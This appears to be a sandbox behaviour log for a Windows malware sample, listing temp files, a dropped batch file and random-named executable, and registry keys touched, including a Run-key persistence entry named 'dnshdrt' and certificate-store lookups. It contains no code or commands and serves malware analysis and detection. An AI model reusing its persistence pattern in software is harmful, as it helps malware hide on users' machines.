C:\Users\user\AppData\Local\Temp\Cab767D.tmp
C:\Users\user\AppData\Local\Temp\Tar767E.tmp
C:\Users\user\AppData\Local\Temp\Cab78C0.tmp
C:\Users\user\AppData\Local\Temp\Tar78C1.tmp
C:\Users\user\AppData\Local\Temp\Cab9A5B.tmp
C:\Users\user\AppData\Local\Temp\Tar9A5C.tmp
C:\Users\user\AppData\Local\Temp\Cab9FD9.tmp
C:\Users\user\AppData\Local\Temp\Tar9FDA.tmp
C:\Users\user\AppData\Local\Temp\CabA01A.tmp
C:\Users\user\AppData\Local\Temp\TarA01B.tmp
C:\Users\user\AppData\Local\Temp\CabA20F.tmp
C:\Users\user\AppData\Local\Temp\TarA210.tmp
C:\Users\user\AppData\Local\Temp\E502\D8E1.bat
C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe
C:\Users\user\AppData\Local\Temp\Cab5CB0.tmp
C:\Users\user\AppData\Local\Temp\Tar5CB1.tmp
C:\Users\user\AppData\Local\Temp\Cab5D2F.tmp
C:\Users\user\AppData\Local\Temp\Tar5D30.tmp
C:\Users\user\AppData\Local\Temp\Cab658A.tmp
C:\Users\user\AppData\Local\Temp\Tar658B.tmp
C:\Users\user\AppData\Local\Temp\Cab767D.tmp
C:\Users\user\AppData\Local\Temp\Tar767E.tmp
C:\Users\user\AppData\Local\Temp\Cab78C0.tmp
C:\Users\user\AppData\Local\Temp\Tar78C1.tmp
C:\Users\user\AppData\Local\Temp\Cab9A5B.tmp
C:\Users\user\AppData\Local\Temp\Tar9A5C.tmp
C:\Users\user\AppData\Local\Temp\Cab9FD9.tmp
C:\Users\user\AppData\Local\Temp\Tar9FDA.tmp
C:\Users\user\AppData\Local\Temp\CabA01A.tmp
C:\Users\user\AppData\Local\Temp\TarA01B.tmp
C:\Users\user\AppData\Local\Temp\CabA20F.tmp
C:\Users\user\AppData\Local\Temp\TarA210.tmp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LDAP
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\LdapClientIntegrity
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseOldHostResolutionOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseHostnameAsAlias
DisableUserModeCallbackFilter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
HKEY_USERS\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Client
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\LjejZswGjULF7Ng.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Ini
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Temp
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextLockCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextListCount
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7\Name
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\StringCacheSettings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\LanguageList
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\p2pcollab.dll,-8042
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\qagentrt.dll,-10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagMatchAnyMask
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Root\ProtectedRoots
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\ChainEngine\Config
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableMandatoryBasicConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableCANameConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableUnsupportedCriticalExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlCountInCert
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCountPerChain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCertCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\CryptnetPreFetchTriggerPeriodSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableWeakSignatureFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\ChainCacheResyncFiletime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\#16
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\Ldap
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CertDllOpenStoreProv
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\Keys
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\CTLs
HKEY_CURRENT_USER\
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\CA\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\CA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\109F1CAED645BB78B3EA2B94C0697C740733031C
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\109F1CAED645BB78B3EA2B94C0697C740733031C\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D559A586669B08F46A30A133F8A9ED3D038E2EA8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D559A586669B08F46A30A133F8A9ED3D038E2EA8\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\FEE449EE0E3965A5246F000E87FDE2A065FD89D4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\FEE449EE0E3965A5246F000E87FDE2A065FD89D4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs\A377D1B1C0538833035211F4083D00FECC414DAB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs\A377D1B1C0538833035211F4083D00FECC414DAB\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\CA
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\CA\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\CA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Disallowed\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Disallowed
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Disallowed
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Disallowed\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Disallowed
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\ProtectedRoots
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\ProtectedRoots\Certificates
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Root\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\AuthRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\85371CA6E550143DCE2803471BDE3A09E8F8770F
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\85371CA6E550143DCE2803471BDE3A09E8F8770F\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D23209AD23D314232174E40D7F9D62139786633A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D23209AD23D314232174E40D7F9D62139786633A\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CRLs
